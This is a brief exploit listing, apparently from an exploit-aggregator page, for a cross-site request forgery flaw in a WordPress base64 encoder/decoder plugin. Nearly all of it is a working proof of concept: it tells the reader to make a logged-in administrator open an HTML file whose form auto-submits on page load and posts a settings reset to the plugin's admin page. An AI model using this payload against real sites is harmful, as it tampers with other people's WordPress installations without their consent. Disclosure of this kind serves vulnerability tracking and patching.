Share
## https://sploitus.com/exploit?id=WPEX-ID:749AE334-B1D1-421E-A04C-35464C961A4A
Make a logged in admin open an HTML file containing the following:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=base64-encoderdecoder%2Fbase64-encoderdecoder.php" method="post">
        <input name="reset" value="1">
        <input type="submit" name="enter" value="reset">
    </form>
</body>

```